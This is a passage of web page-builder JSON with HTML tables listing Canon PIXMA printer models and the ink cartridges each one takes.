width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 